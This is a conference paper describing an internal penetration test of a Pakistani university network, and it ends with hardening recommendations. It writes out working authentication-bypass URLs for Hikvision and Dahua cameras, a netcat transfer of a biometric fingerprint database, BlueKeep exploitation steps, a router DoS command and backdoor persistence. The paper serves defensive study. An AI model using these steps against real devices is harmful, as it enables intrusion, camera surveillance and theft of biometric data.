19 December 2020 (INCCST’20), MUET Jamshoro Case Study ...
Transcript of 19 December 2020 (INCCST’20), MUET Jamshoro Case Study ...
2nd International Conference on Computational Sciences and Technologies, 17-19 December 2020 (INCCST’20), MUET Jamshoro
ISBN-978-969-23372-1-2 114
Case Study: Intranet Penetration Testing of MUET
Shameel Syed
Department of Telecommunication
Mehran University of Engineering and
Technology
Jamshoro, Pakistan
Faheem Khuhawar
Department of Telecommunication
Mehran University of Engineering and
Technology
Jamshoro, Pakistan
Khizra Arain
Department of Telecommunication
Mehran University of Engineering and
Technology
Jamshoro, Pakistan
Talha Kaimkhani
Department of Telecommunication
Mehran University of Engineering and
Technology
Jamshoro, Pakistan
Zohaib Syed
Department of Telecommunication
Mehran University of Engineering and
Technology
Jamshoro, Pakistan
Hasan Sheikh
Department of Telecommunication
Mehran University of Engineering and
Technology
Jamshoro, Pakistan
Shahroz Khan
Department of Telecommunication
Mehran University of Engineering and
Technology
Jamshoro, Pakistan
Abstract—Every organisation with its available resources
requires its network to be secure from any sort of internal or
external threats. This requires implementation and proper
assessment of overall security measures. In this paper, we highlight
how educational campus intra-network can be highly vulnerable
due to improper configurations or inadequate security measures.
Our investigation through penetration testing has allowed us to
gain access of more than 50% of distribution and core switches
from Cisco, IP cameras from Dahua and Hikvision, Bio-metric
Systems from ZKTeco, MikroTik RouterOS, and PCs/Serves
having vulnerabilities like BlueKeep. Systematic procedure is
presented in this paper to perform the attacks along with the recommendations to implement proper security measures.
Keywords—Network Security; Penetration Testing; Testing;
Exploitation; Attacks
I. INTRODUCTION
If vulnerability is utilized by an unauthorized individual to
access a company’s network, its resources can be compromised.
The objective of a penetration test is to address vulnerabilities
before they can be exploited. Penetration testing is a
comprehensive method to test the complete, integrated,
operational tests that consists of hardware, software and people.
There are three main types of penetration testing namely, black
hat penetration testing, white hat penetration testing and grey
hat penetration testing.
Black hat penetration testing scans the remote hosts for
possible vulnerabilities with no prior knowledge of target,
analyzes the vulnerabilities and their possible risk, and finally
report them. White hat penetration testing is provided with a
significant knowledge of the target. It is a simulation of an
attack by a penetration tester who is having a detailed
knowledge of the network environment. Grey hat penetration
testing, also called gray box analysis, is a strategy in which the
tester has limited knowledge of the internal details of the
network. Gray hat approach is used when specifically, the threat
of the attack is considered to be an inside job. We have used
Grey Hat Approach in our research. Penetration testing has 4
steps to perform.
• Reconnaissance/ Information Gathering
• Scanning
• Exploitation
• Post exploitation
Network scanning is a procedure for identifying devices on a
network by employing features in the network protocol to
signal devices and wait for a response. Most network
scanning is used in monitoring and management, but scanning
can also be used in identifying network elements or users for
attacks. Exploitation is a piece of a software, a sequence of
commands or a chunk of data that usually takes advantage of
bug or vulnerability to cause unintended things or unintended
behavior to occur on target machines. Such unintended
behaviors include features like gaining control of a system,
allowing privilege escalation or Denial of Services (DoS)
attacks. Most devices connected to the Internet these days are
not maintained and monitored properly. Instead, these are
devices that are often not understood as computers but are
termed as” things”, giving rise to the term,” Internet of Things”.
II. Literature Review
A penetration test is defined as a controlled attempt of
penetrating into a network from outside in order to detect
vulnerabilities [1]. In this age of continuously advancing
technologies, every organization whether it be a university, a
115
hospital or military organization is network based. This makes
work-related tasks more efficient and effective but also
increases their risk of being targeted by a malicious threat either
for any agenda or for personal gain. This is where penetration
testing is important. Offensive security techniques are used in
order to discover possible flaws in the network. For an IoT
company, it can be said as an act of complimenting the
defensive security measures before IoT motes are deployed [2].
It is a basic instinct of a security expert to think like a criminal
in order to fill the gaps from criminals’ perspective. So, it is a
basic necessity for the penetration tester to know as much as or
more than what an attacker can know, in order to make the
results meaningful [3].
Wireless connections are low cost and convenient for
connecting network devices. The simplicity with which it gives
connection is also a reason for attackers to target wireless
network. Therefore, authentication protocols have been made
for keeping unauthorized access out of the network. The two
most commonly heard encryption schemes for wireless
networks are Wired Equivalent Privacy (WEP) and Wi-Fi
Protected Access (WPA). The WEP algorithm was made to
secure wireless internet connections in 1997, but it was
vulnerable on many levels [4]. So WPA was developed as a
second encryption standard which solved many problems lying
in WEP. The latest version of WPA is WPA2. WPA2 provides
stronger encryption than that of WPA rated standard [5]. Both
gives the choice of two security modes, i.e., TKIS and AES
encryption modes. WPA2-PSK protocol can be used in a
wireless distribution system. For home users, WPA2PSK (AES
Pre Shared Key) is used. The corporate security is based on
802.1X, the EAP authentication framework that uses a
RADIUS, such as EAP-TLS, which provides a much stronger
authentication system, and secure key distribution [6]. The
greatest attack that engraved its name recently is WannaCry.
WannaCry is a type of a ransomware; a ransomware is a type
of malware that takes full control of the targeted system and
demands ransom for the safe return of the functionality of the
system. WannaCry is a software that make use of Eternal Blue
and Double Pulsar. It started on May 12, 2017. Eternal Blue is
a well-known vulnerability in the Server Message Block (SMB)
protocol employed by Microsoft Windows operating the ports
445 and 139. Once the malware is injected in the machine, it
searches for backdoor. WannaCry malware spread to over
300,000 systems in over 150 countries [7]. There was only one
agenda of WannaCry, to collect ransom. It froze or completely
locked down the target systems by placing an encryption and
demanded about $300$600 to release the lock.
CCTV cameras, that are the very eyes of an organization and
keep security in check, can also be exploited. A cyber-attack on
a Russian bank gave hackers access to 24,000 CCTV cameras
in 30 different countries. This attack led the bank to lose more
than 31 million USD. [8] Recently, a new vulnerability released
in Microsoft’s RDP service which is considered to be as
dangerous as EternalBlue. This paper also illustrates the
exploitation and safety measures of this vulnerability.
According to the estimation provided by US Computer
Emergency Response Team (Cert), almost 40 percent of IT
security breaches are perpetrated by people inside the company.
Additionally, FBI/CSI Risk Assessment implied that many
enterprises’ ports are opened, and any laptop can plug into the
network and gain access as a common practice. The total loss
of the companies surveyed was approximately over 130 million
USD with average expenditure per employee being about 241
million USD per year. 28 percent of the employees stated they
had no idea if they were attacked and how many times they
were attacked. Yet about 32 percent of employees said they
were never attacked from the inside. This paper deals with the
penetration test procedure for determining the security levels so
as to highlight the possible vulnerabilities that could be
exploited in the Campus Area Network (CAN) of Mehran
University of Engineering and Technology (MUET) including
the IP cameras, Biometric systems, and switches deployed
within the network. This paper explains various data link
protocols that have been compromised during the research.
Although, a lot of work has been done in the area of penetration
testing, we have specifically followed standard penetration
testing on the live network of Mehran University of
Engineering and Technology using Gray Hat approach.
III. METHODOLOGY
Network Penetration testing has following four steps.
A. Reconnaissance
Reconnaissance is the process of collecting information
about the target without being discovered, and use that
information to perform a detailed penetration test.
Reconnaissance is the biggest phase any penetration tester goes
through to identify devices on the network and their
interconnection. Generic topology of campus area network is
shown in Figure 1 that is gained through survey and later
verified.
Fig. 1: Network Diagram of Campus Area Network
To gain basic information about DHCP, DNS and subnet IP
address, following commands were used.
116
username@hostname:∼$ ifconfig
It was found that subnet IP changed with the change of
departments, i.e., every department at MUET has different
subnet ID, and DHCP was part of it. Whereas, the local DNS
information remained same. ICMP (ping) messages were sent
from one department to another, as a result of which it was
realized that tagged information was being sent along with a
VLAN ID. Using this approach, information about VLANs of
different departments were collected. Later, this information
was verified after discovering misconfigured switches that
allowed unauthenticated bypass, if first two or three sessions
via telnet protocol are maintained beforehand, whereas fourth
session allows an attacker to enter the switch without prompting
for any password.
username@hostname:∼$ telnet 172.16.X.X
This allowed Cisco IOS shell to be enabled, and eventually
configuration file can be read, through which complete toplogy
of MUET’s network can be discovered, i.e., how core,
aggregation, distribution, and access switches are
interconnected with one another. Furthermore, additional
information, such as rules of ACL and configuration of L2
protocols such as CDP, VTP, STP, and DTP, was also collected.
B. Scanning
The process of Scanning identifies security weaknesses in
remote target network or local hosts. To achieve this, IP address
information of live hosts and layer-2 devices was collected.
Later, targeted hosts were scanned for open ports using a tool
called nmap.
username@hostname:∼$ nmap -T4 -A -v
By this approach, tables of hosts with IP addresses and their
corresponding MAC addresses along with open ports were
made. Due to VLANs restriction, initially, the scan was being
done on each VLAN separately. Later on, after the exploitation
of core switch, detailed information was retrieved quickly and
without any exhaustion.
C. Exploitation
1) Switches: The switches with open Telnet ports were
targeted, after a care-full review of scanning results. Upon
attempting to access switches, it was discovered that more than
50% switches used default credentials, irrespective of their
vendors. Switches that had their default passwords changed,
were misconfigured, such as using vty 0 4, allowing accessing
to switch after 5 simultaneous virtual connection sessions.
Figure 2 shows snapshot of accessing the core switch.
1 The tool hashcat needs to be installed first on the PC (Linux or
Windows).
Fig. 2: Accessing Core Switch
It was discovered that “Cisco IOS Shell” was enabled,
through which configuration files of all of the core switches
could be copied. From these configuration files, intensive
information that helped in exploiting various L2 protocols was
gathered. Hash password of users having privilege level of 15
and password to enter global configuration mode of the switch
can also be retrieved from the configuration file which was later
on cracked with the help of hashcat1.
This paper demonstrates the use of hashcat from Windows
OS. Assuming that hashcat is installed in C drive, following
command was used to brute-force the password, while
assuming that the password consisted of 6 characters, where
crack.txt is the name of the files which stores hashes of Cisco
Type 5. The output of hashcat is shown in Figure 3.
C:\hashcat>hashcat64.exe -a 3 -m 500 crack.txt ?a?a?a?a?a?a
Switches with Cisco IOS are by default allowed to write data
into flash storage, this was further exploited to write malicious
code and somehow trigger it to spread the malware throughout
the network. Figure 4 demonstrate the proof of writing and
adding a text file into the core switch.
All of the files in flash storage of the switch can be seen and
the configuration file can be read using cat command.
Fig. 3: Hashcat
Fig. 4: Writing data into the flash storage of core switch
Linksys switches have been exploited through a
vulnerability, called “The Moon”. This vulnerability can be
exploited through Metasploit or Routersploit. Figure 5
demonstrates how it is done.
117
Fig. 5: Exploitation of Linksys switches
Remote network connection is a basic necessity for the
management of enterprise networking devices. Accessing
routers and switches on daily basis for tasks such as, creating
and removing VLANs, adding or removing interfaces. The
access to the router/switch is done via either Telnet or Secure
Shell (SSH). Using Telnet is rather common even if it is an
insecure way. It is highly recommended that SSH be used
instead of
Telnet.
2) Routers: It was discovered that the currently deployed
router on the campus was running MikroTik Router OS 42.9.
An easier approach was carried out in which a preinstalled tool
called searchsploit was utilized in order to find the
vulnerabilities of the vendor MikroTik.
Figure 6 shows that MikroTik RouterOS v6.42.9 is
vulnerable for the following defined version. To exploit,
following command was used. cat /usr/share/exploitdb/exploits/hardware/remote/46444.txt
Furthermore, DoS attack defined in the exploits as searched
by Searchsploit can be performed on MikroTik RouterOS using
following command. python /usr/share/exploitdb/exploits/hardware/dos/18817.py
172.16.X.X config 9
3) IP Cameras: Organizations pay no attention to
security vulnerabilities before purchasing and deploying CCTV
cameras. Our investigation led us to exploit IP cameras from
different vendors, most of the vulnerabilities of these devices
Fig. 6: Searching Exploits by Searchsploit
are well documented, yet they were still not patched. We
demonstrate how easy it was to gain access into the CCTV
system using brute-force attack via a tool called Hydra. Figure
7 demonstrates how Hydra is used.
Fig. 7: Dictionary Attack on IP Cameras
From those IP Cameras, database was extracted but the
passwords were encrypted using the proprietary algorithm of
the company. Hash passwords were extracted from the database
and those hashes were put to access cameras from Hikvision.
This allowed access to camera directly, suggesting poor
implementation from Hikvision and a vulnerability of these
cameras.
Another downside of using IP cameras on intranet is that the
passwords have to be hashed offline, which means that the
algorithm must be somewhere in the system. After exploring
the camera, algorithm was found to be in sofia.py. Figure 8
demonstrates how this algorithm converts “888888” to hash.
Fig. 8: Hashing Algorithm
Afterwards, a script was written to perform brute-force attack
to find the passwords of the registered users and thus access was
gained on different cameras which were not accessible via
Telnet. It was found out that “Hikvision” and “Dahua” use the
same algorithm to convert plain-text into hash. The database
from some of the cameras was compromised due to the
existence of backdoor in the camera using these different links
on different cameras: http://<IP>:<Port>/mnt/mtd/Config/Account1
http://<IP>:<Port>/mnt/mtd/Config/Password http://<IP>:<Port>/current-
config/Passowrd
After Dahua noticed that hackers have been accessing
cameras by default usernames and passwords, they gave a patch
that disabled the telnet access. However, disabling the remote
access turned out to be a much bigger obstacle for users to
access IP cameras than it was thought, because in case
usernames and passwords were forgotten, there was no way to
access the cameras. To cope with that situation, Dahua gave a
script to access cameras through telnet. http://<IP>:<Port>/cgi-bin/configManager.cgi?action=
setConfig&Telnet.Enable=true
After entering the script, a username and password is asked.
But before the password, a string “7ujMko0” had to be added.
For example, if username and password is “admin”, so
password has to be provided like: “7ujMko0admin”. Recovered
passwords retrieved from previous methods were utilized with
this string, and it also let default credentials open the telnet door
of various cameras.
In some cameras of Hikvision, entering following script into
the browser allows an attacker to bypass authentication. http://<IP>:<Port>/Security/users?auth=YWRtaW46MTEK
118
Worst part is that, by using this method, configuration file of
Hikvision cameras can also be downloaded. http://<IP>:<Port>/System/configurationFile?auth= YWRtaW46MTEK
This configuration file contains usernames and passwords (in
plain-text) for all configured users. Files are encrypted but
encryption is easily reversible because of the presence of a
static encryption key which is derived from the password “abcdefg“.
http://<IP>:<Port>/onvif-http/snapshot?auth=YWRtaW46MTEK
Above script allows the attacker to take a snapshot from the
IP camera as it can be seen in Figure 9.
Fig. 9: Snapshot Taken by Entering Script
This vulnerability also allows an attacker to change the
password of the IP cameras of Hikvision very easily as it can
be demonstrated in Figure 10.
There is a protocol, “Onvif”, which was enabled on majority
of the cameras and it was left unprotected due to the lack of
knowledge of this protocol. Through this protocol, the use of
the URL in a software like “VLC Media Player“allows access
to the IP Cameras using default credentials. rtsp://<IP>:<Port>/cam/realmonitor?channel=1&subtype=0&
unicast=true&proto=Onvif
“Onvif Device Manager” can be used to manage the cameras
in which this protocol is enabled. This allow to add/delete users,
change the movement of the camera, speak into the camera,
changing DNS server, changing NTP server and other features
as well. The snapshot of using Onvif to access IP cameras is
shown in Figure 11.
Fig. 10: Software based on this vulnerability
Fig. 11: Accessing cameras using ONVIF
4) Bio-metric Systems: Bio-metric fingerprint systems are
used throughout the campus for the purpose of attendance of
faculty members in the campus, and in some organizations, bio-
metric systems are used as locks for doors. Penetration testing
is done on two models of ZKTeco, uFace800/ID and
iClock880-H/ID. Linux Kernel embedded in these systems are
ZM220, ZEM600 and ZEM800.
Telnet door was enabled on these machines and default
passwords were not changed due to which access was gained
into the systems after performing brute-forcing with the use of
probable wordlists. Figure 12 demonstrates accessing IP
camera via telnet.
Fig. 12: Accessing biometic via Telnet
First, database file were searched using the following command.
find -name *.db
119
It will search all the files in the system having extension .db,
which denotes a database file. After navigating to that directory,
a database file was transferred using a tool netcat. The
command from sending side (ZEM220) was,
nc 172.16.23.32 9999 < ZKDB.db
172.16.23.32 is the IP of the PC where file was required to
be received but port 9999 had to be open on the PC that received
the transferred file using the following command on the PC.
nc -l -p 9999 > ZKDB
Where, -l denotes that the port 9999 is opened to listen from
the remote connection. “sqlite” or any other software can be
used to view the transferred file.
After making changes, the .db file was uploaded to system
the same way it was downloaded, using the tool netcat.
UDP Port 4370 of ZK5000-ZK9000 allows anyone to
connect to the system without any proper authentication.
Custom commands can be created and sent to the device
through UDP port 4370 to download information. This can be
confirmed using the tool called Scapy from Linux OS.
Alternatively, proprietary software of this company is also
available which uses this port to connect to the device without
password. Although other versions of this software can be used
to exploit this vulnerability, but this has been confirmed by
employing the software “ZKTeco 5.0” as shown in Figure 13.
Fig. 13: Snapshot of ZKTeco 5.0
This shows that one device has been connected, without
providing any password. Following actions can be performed
with this software;
1) Add a user
2) Delete a user
3) Change privileges of users
4) Modify Attendance Logsheet, i.e., change time and nature
of attendance
This database can be decrypted to extract the fingerprints of
the users registered in the device these extracted fingerprints
then can be used against the user in various ways, i.e.,
impersonation, identity theft, etc.
5) Exploiting Vulnerabilities in an Operating System: In
different networks of different organizations, there is a
plethora of vulnerabilities to exploit varying in accordance
to the users. Different vulnerabilities were discovered in
scanning phase which have been exploited to gain access
in various systems. One of the most common vulnerability
to access the system is Eternal Blue which could be
exploited easily through Metasploit framework. This
paper focuses on following two vulnerabilities.
Firstly, this paper demonstrate the exploitation of an old bug
that has been present in Netatalk for a long time. Pea is a proof
of concept which bypasses authentication to gain control of
execution flow of Netatalk as shown in Figure 14. This
vulnerability has been patched in 3.1.10. Further details of this
explanation can be found on the website of NIST by searching
for CVE-2018-1160.
Fig. 14: Exploitation of Netatalk 3.1.10
Secondly, this paper explains the exploitation of a
vulnerability which is a hot topic these days. Bluekeep
(CVE2019-0708) is a recently found vulnerability that has been
discovered in RDP service of Microsoft. This is a wormable
vulnerability which can be considered as dangerous as
EternalBlue. After being exploited, this vulnerability provides
an attacker with complete access on host’s system.
From scanning phase, information was gathered to know
which hosts are using RDP Service of Microsoft. Following text
demonstrates further scanning it with the module of Metasploit,
to evaluate how many of the hosts are vulnerable to Bluekeep
vulnerability.
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 172.16.100.3 172.16.100.5 172.16.100.6
172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
RHOSTS => 172.16.100.3 172.16.100.5 172.16.100.6
172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[*] 172.16.100.3:3389 - The target is not exploitable.
[*] 172.16.100.4:3389 - The target is not exploitable.
[*] Scanned 2 of 18 hosts (11% complete)
[+] 172.16.100.5:3389 - The target is vulnerable.
[*] 172.16.100.7:3389 - The target is not exploitable.
[*] Scanned 4 of 18 hosts (22% complete) [+] 172.16.100.11:3389 - The
target is vulnerable.
...
Since metasploit recently launched the module for exploiting
Bluekeep, the module had to be manually added.
wget https://github.com/rapid7/metasploit-framework/raw/
edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/
exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
mv cve_2019_0708_bluekeep_rce.rb
/usr/share/metasploitframework/modules/exploits/windows/rdp/
After that, open metasploit and run the following command,
reload_all
120
set RHOST target and launch the attack. After the attack was
done, a meterpreter shell was provided through which complete
access over victim’s PC was gained as it can be seen in Figure
15.
Fig. 15: Exploiting Bluekeep
Other than exploiting devices as a whole, this work also
focuses on exploiting protocols of data-link layer in TCP/IP
suite.
The main purpose to build TCP/IP suite was to ensure that
different layers work without the knowledge of each other. But
unfortunately, this means that if any one layer of TCP/IP suite
is attacked, other layers will not get any idea of the problem. In
networking, layer-2 is a very weak link and prone to attacks.
Following layer-2 protocols have been compromised namely,
ARP, VTP, STP, and DTP.
6) ARP Spoofing: ARP is used to discover MAC address
associated with given IP address. A client can send an
unsolicited reply which is called a gratuitous ARP, and other
hosts can save that information in their ARP tables in the same
subnet. This way, anyone can claim to have any IP/MAC
address. This is how ARP attacks redirect traffic. There are
certain countermeasures to ARP spoofing attacks, such as using
DHCP snooping binding table, in which it is necessary for all
ARP packets to match the binding table entries or else the ARP
packets will be discarded. This is done when dynamic ARP
inspection is enabled. In the network under consideration,
DHCP Snooping is enabled but there is a Proxy Server
deployed in the network which authenticates each time a
request is sent. Since the Proxy server is using HTTP protocol,
then by poisoning the whole VLAN, usernames and passwords
of clients can be retrieved. MITMF v0.9.8 tool is used to
demonstrate the procedure as shown in Figure 16. The example
demonstrates ARP poison by setting gateway address and target
range.
Fig. 16: ARP Spoofing using MITMF
7) DTP Attack: On a switch, a port is configured in two ways.
Either as an access port or as a dynamic port.
When a host is connected to a switch, an access port is used.
With VLAN implementation, each access port is assigned to
only one VLAN. On the contrary, a trunk port allows the traffic
of multiple VLANs to pass through. A trunk port can be
configured via a Cisco propriety protocol called Dynamic
Trunking Protocol (DTP). DTP automates the IEEE 802.1x/ISL
Trunk configuration. It does not operate on routers.
Synchronization of trunking mode on end links is done by the
DTP. DTP state on trunking port can be set to “Auto”, “On”,
“Off”, “Desirable”, or “Non-Negotiate”.
In switch spoofing attack, the attacker impersonates as a
switch in order to trick a legitimate switch into creating a
trunking link between them. As already mentioned, any
VLAN’s packets are allowed to pass through the trunking link.
Upon establishment of the link, traffic from any VLAN can be
accessed by an attacker. The chance of success of this exploit
depends solely on the fact that the legitimate switch is
configured as “Dynamic Desirable”, “Dynamic Auto” or
“Trunk mode”. Since the switches under consideration were
configured as “Auto”, so a switch spoofing attack was
performed using the tool Yersinia v0.8.2 as shown in Figure 17,
and thus a trunk link was formed.
Fig. 17: DTP attack using Yersinia
It can be clearly seen that, access port was assigned and then
it turned into trunk link after a successful DTP attack. This
attack also provides a way for VLAN hopping attack / double
Encapsulation attack. This attack can be prevented by manually
assigning each port as an access or trunk port. Further security
121
measures include using a different VLAN other than default
VLAN as a Native VLAN.
8) VTP Attack: Switches are added to a VTP domain for them
to use VTP. This VTP domain is defined in a VTP server, and
later clients and transparent devices as well. Whenever a new
VLAN is added/created in a VTP server, the VTP server will
automatically distribute this information among all the switches
present in the VTP domain. All the switches (except the VTP
server) are defined as client switches, and their task is to listen
to the changes regarding VLANs by the VTP server. Switches
that are configured transparent, without altering their VLAN
assignments, will simply forward the VTP information. This is
really useful when there are a lot of switches involved in the
network. Since all VLAN information can simply be altered
from any place and automatically be changed due to VTP
server. On the other hand, some risks are involved that an
attacker could exploit that usefulness by creating a rogue VTP
server and gain complete control over the VTP domain VLANs.
To remedy that, VTP implements MD5-based authentication in
the VTP frames. In MD5 authentication, VTP server has a
password for authenticating the VTP domain switches, without
that password switches will not authenticate VTP information.
Password is sent in MD5 hash. This hash is then verified and
used by the client switch. There are mainly two facts to consider
when injecting VTP frames. The port should be turned into a
trunk by the attacker (via DTP attack), and the VTP
configuration revision number should be higher than the
previous advertisements of VTP for recent update reflection.
By adding or deleting the VLANs via a rogue VTP server, a
VTP attack is done.
Fig. 18: VTP Information
A rogue VTP server can be made on any switch by increasing
the revision number from the previous one (previous revision
number was known by viewing VTP information in core switch
as shown in Figure 18), after sending the command to change
VLAN configurations via rogue VTP server, the MD5 hash was
sent with that frame and there were no qualms in accepting that
malicious frame since the hash was authenticated. This was
done using the tool Yersinia. It is important to know that
exploitation of MD5 hash was possible because switches were
configured with VTP Version 2. The remedy of that is to
implement VTP Version 3. VTPv3 uses status made up of
primary and secondary VTP servers. Primary status is used only
when there is a need to make changes. Other switches are
secondary by default which secures the network from this
attack.
9) CDP Attack: The Cisco Discovery Protocol (CDP) is
another propriety protocol of Cisco used by all devices by
default. Directly connected devices are discovered using CDP,
to simplify their configuration and connectivity. There is no
maintained encryption in CDP messages. Information of CDP
is broadcasted periodically, updating each device’s CDP
database. Routers cannot propagate it because CDP is a layer 2
protocol. Information of network devices such as software
version, IP address, capabilities, platform, interfaces and the
native VLAN information are gathered up in CDP. Ultimately,
whole network’s topology could be determined using CDP and
if it gets into an attacker’s hand, this information could be used
to exploit the network in many ways, mainly in the form of a
Denial of Service (DoS) attack. Attacker can get CDP
information via Wireshark or other network analyzer tool to
sniff out the broadcast messages sent by the CDP. For example,
if attacker gets to know the Cisco IOS version of the device as
shown in Figure 19. This information is enough to search for
exploits in that particular version. The attacker can also send
malicious or bogus CDP packets to the directly connected Cisco
devices, which can cause the switch to utilize its CPU to a
maximum of 100%.
CDP is a useful protocol when documentation of a network
is being made and in most cases CDP is enabled on every switch
and port in the network.
Fig. 19: CDP
10) STP Attack: Spanning Tree Protocol (STP) is used to
avert the loops being formed on layer-2 switches or bridges
network with multiple paths for redundancy reason. Switches
are made aware of each other and the bandwidths of links being
used between them. The switches can then select a path that is
both loop-free and with maximum possible bandwidth in the
network. The decision of choosing the link is based on STP path
cost. There is a reference point to control the STP called Root
Bridge. The root of STP is selected from the switches via
Election Process. All the traffic goes through root bridge.
Subsequent to the election of root bridge, a root port is elected
that has the shortest STP path cost to the root bridge. After that,
designated ports for each segment of network are selected. All
the STP attacks differ based on the modification of one or more
fields of BPDU frames. After sniffing existing legitimate
BPDUs and taking their settings into account, the most
dangerous attack type would be presenting a machine under
122
your control as the Root Bridge, so that all the traffic in the STP
topology should go through the attacker.
STP BPDUs should not propagate through access ports, but
such BPDUs were accepted due to misconfiguration. Knowing
the bridge priority from the reconnaissance phase (via core
switch), bridge priority of a switch chosen from the network
was changed to be lower than the root switch, thus making that
switch the root bridge which enabled the whole data to be
sniffed. Above mentioned attack (called root role attack) can be
thwarted by Root Guard and BPDU-guard, which were not
enabled here. Secondly, STP DoS attack was also performed by
sending thousands of packets per second with the help of
Yersinia. The switch processed so many config BPDU packets
which kept on constantly changing the root bridge within the
STP topology, rendering STP confused. Thirdly, another DoS
attack was performed in which TCN BPDUs were sent to the
root bridge which caused the STP topology to change
continuously. BPDU filtering can be used to mitigate both
above mentioned DoS attacks.
11) DHCP Starvation: DHCP protocol is an integral
component, the function of which is the configuration of client
machines with IP addresses and other information such as
subnet mask, DNS address and default gateway.
DHCP starvation is an attack that targets DHCP servers in
which malicious DHCP requests are made to exhaust the IP
pool of all the available IP addresses. As a result, proper
network users get DoS. DHCP Starvation can be launched even
with a minimal bandwidth [9].
In our attack, it can be seen in Figure 20, DHCP Release
Message is sent as broadcast in the VLAN to release IP
addresses of the users, followed by immediately sending DHCP
Request Message to completely exhaust the IP pool of the
DHCP server.
Fig. 20: DHCP Attack
Afterwards, DHCP Rogue Server can be created to assign IP
addresses through our system and then perform ManIn-The-
Middle attack on the victims who have obtained IP addresses
through rogue DHCP.
D. Post Exploitation
The purpose of this phase is to create a alternate way to get
into the system so that the accessibility to compromised
systems remain intact. For that, backdoors were created and
then deployed on compromised IP Cameras and Biometric
systems. In bio-metric systems, persistent backdoor was created
via netcat tool. However, different vendors of IP Cameras (or
even some bio-metric systems) do not support netcat tool, so in
order to create persistent backdoors in such systems, tools like
ShellPop or TheFatRat can be used.
IV. CONCLUSION
Securing the network of an organization requires penetration
testing. This helps to identify vulnerabilities which can be
exploited for malicious intentions. Network administrator
should be aware of the security aspect of different protocol
configurations on networking device. This awareness helps
employees to avoid internal, external, and social engineering
attacks on network. Moreover, a well thought out security
policy which lines in with the organization’s need is rather a
very important factor when deploying a network.
The following step must be taken to mitigate the threats as
outlined in this research paper. (1) Change the default
credentials of all the protocols configured in a network. And for
the devices which allow unauthenticated access shouldn’t be
allowed remote access. Alternatively, a restricted access should
be allowed to authorized users by deploying specific security
policies. (2) Configure port security to prevent DHCP
starvation attack. (3) Enable DHCP snooping feature will
prevent Rogue DHCP Server attacks. (4) ARP attacks can be
prevented by Dynamic ARP Inspection (DAI). (5) IP/MAC
spoofing can be prevented using IP source guard (IPSG)
feature. (6) SSH should be used instead of Telnet to configure
network devices remotely as Telnet establishes a session where
information flows in plain text which can be easily sniffed via
Wireshark or any other sniffing tool. (7) Passwords must be set
for all VTY sessions and not just for the first three or four
sessions otherwise attacker can exploit this to attack a network.
(8) Port security should be enabled on all the active interfaces
(access port) of switch and all unused port should be shut down
to avoid unauthorized access. (9) IDS or ARP inspection
prevents ARP attack. (10) For prevention of attacks related to
STP, BPDU-guard and Root-guard feature should be enabled.
(11) Use VTP version 3 to fend off against VTP attacks. (12)
Use CDP only when it is necessary.
REFERENCES
[1] S. Turpe and Jrn Eichler. Testing production systems safely: Common
precautions in penetration testing. pages 205 – 209, 10 2009. [2] Chung-Kuan Chen, Zhi-Kai Zhang, Shan-Hsin Lee, and Shiuhpyng Shieh.
Penetration testing in the iot age. Computer, 51:82–85, 04 2018. [3] Bishop Matt. About penetration testing. IEEE Security and Privacy,
5(6):84–87, 2007. [4] Erik Tews and Martin Beck. Practical attacks against wep and wpa. In
Proceedings of the second ACM conference on Wireless network security,
123
pages 79–86. ACM, 2009. https://dl.acm.org/citation.cfm?id=1514286,
last accessed on 2019-09-30. [5] Joseph Mwangi, Dr. Wilson Cheruiyo, and Dr. Michael Kimwel. Security
analysis of wpa2. Control Theory and Informatics, 5, 2015. https://pdfs.
semanticscholar.org/bbd9/af99e0ff0a1df675d4dbac81b8d815999869.pdf,
last accessed on 2019-09-30. [6] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and Behrang
Samadi. A survey on wireless security protocols (wep, wpa and
wpa2/802.11 i). In 2009 2nd IEEE International Conference on Computer
Science and Information Technology, pages 48–52. IEEE, 2009. https:
//ieeexplore.ieee.org/abstract/document/5234856, last accessed on
201910-12. [7] Ashok Koujalagi, Shweta Patil, and Praveen Akkimaradi. The wannacry
ransomeware, a mega cyber attack and their consequences on the modern
india. International Journal of Information Technology, 6(4):1–4, apr
2018. [8] Mohammed Farook Bin Rafiuddin, Prethpal Singh Dhubb, and Hamza
Minhas. Recent study of close circuit television (cctv) in hacking.
International Journal of Advance Research in Science and Engineering,
6(4):551–561, apr 2017. [9] N. Tripathi and N. Hubballi. Exploiting dhcp server-side ip address conflict
detection: A dhcp starvation attack. In 2015 IEEE International
Conference on Advanced Networks and Telecommuncations Systems
(ANTS), pages 1–3, Dec 2015.